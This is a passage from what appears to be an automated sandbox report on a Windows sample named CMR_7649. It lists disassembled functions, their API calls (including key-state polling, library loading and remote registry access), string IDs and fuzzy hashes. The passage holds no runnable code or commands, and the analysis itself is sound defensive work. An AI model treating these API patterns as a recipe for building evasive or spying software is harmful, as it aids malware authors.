                                                • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                • ExitThread.KERNEL32 ref: 004151ED
                                                • __freefls@4.LIBCMT ref: 00415209
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                • String ID:
                                                • API String ID: 442100245-0
                                                • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                                                • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                                                Function 0045F790 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 216windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                                • _wcslen.LIBCMT ref: 0045F94A
                                                • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                                                • String ID: 0
                                                • API String ID: 621800784-4108050209
                                                • Opcode ID: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                                                • Opcode Fuzzy Hash: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                                                Function 00478172 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 176COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                • SetErrorMode.KERNEL32 ref: 004781CE
                                                • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                                  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                • SetErrorMode.KERNEL32(?), ref: 00478270
                                                • SetErrorMode.KERNEL32(?), ref: 00478340
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                                • String ID: \VH
                                                • API String ID: 3884216118-234962358
                                                • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                                                • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                                                Function 00448480 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 107windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                                • IsMenu.USER32(?), ref: 0044854D
                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                                • DrawMenuBar.USER32 ref: 004485AF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Menu$Item$DrawInfoInsert
                                                • String ID: 0
                                                • API String ID: 3076010158-4108050209
                                                • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                                • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                                Function 00469CDB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 100windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                                                • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                                                • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: MessageSend$_memmove_wcslen
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 1589278365-1403004172
                                                • Opcode ID: e833c5f683c324df3584e13527d60df096f9c23fae9490791bb62fc6faf22f53
                                                • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                                                • Opcode Fuzzy Hash: e833c5f683c324df3584e13527d60df096f9c23fae9490791bb62fc6faf22f53
                                                • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                                                Function 00443442 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 93COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Handle
                                                • String ID: nul
                                                • API String ID: 2519475695-2873401336
                                                • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                                • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                                Function 0044334F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Handle
                                                • String ID: nul
                                                • API String ID: 2519475695-2873401336
                                                • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                                • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                                Function 00440C49 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: SysAnimate32
                                                • API String ID: 0-1011021900
                                                • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                                                • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                                                Function 00461554 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                  • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                  • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                  • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                  • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                                • GetFocus.USER32 ref: 0046157B
                                                  • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                                  • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                                • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                                • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                                                • __swprintf.LIBCMT ref: 00461608
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                                                • String ID: %s%d
                                                • API String ID: 2645982514-1110647743
                                                • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                                                • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                                                Function 00462A31 Relevance: 7.7, APIs: 5, Instructions: 227COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                                                • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                                                Function 004757A7 Relevance: 7.7, APIs: 5, Instructions: 220COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                                                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                                                • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Process$CloseCountersCurrentHandleOpen
                                                • String ID:
                                                • API String ID: 3488606520-0
                                                • Opcode ID: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                                                • Opcode Fuzzy Hash: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                                                Function 0046B4CF Relevance: 7.7, APIs: 5, Instructions: 157registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ConnectRegistry_memmove_wcslen
                                                • String ID:
                                                • API String ID: 15295421-0
                                                • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                                                • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                                                Function 00464812 Relevance: 7.6, APIs: 5, Instructions: 145libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                                                • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                                                • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                                                • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                                                • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: AddressProc$Library$FreeLoad
                                                • String ID:
                                                • API String ID: 2449869053-0
                                                • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                                                • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                                                Function 00456391 Relevance: 7.6, APIs: 5, Instructions: 130keyboardCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCursorPos.USER32(?), ref: 004563A6
                                                • ScreenToClient.USER32(?,?), ref: 004563C3
                                                • GetAsyncKeyState.USER32(?), ref: 00456400
                                                • GetAsyncKeyState.USER32(?), ref: 00456410
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: AsyncState$ClientCursorLongScreenWindow
                                                • String ID:
                                                • API String ID: 3539004672-0
                                                • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                                                • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                                                Function 0047D40F Relevance: 7.6, APIs: 5, Instructions: 120sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                                • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                                                • Sleep.KERNEL32(0000000A), ref: 0047D455
                                                • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                                • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
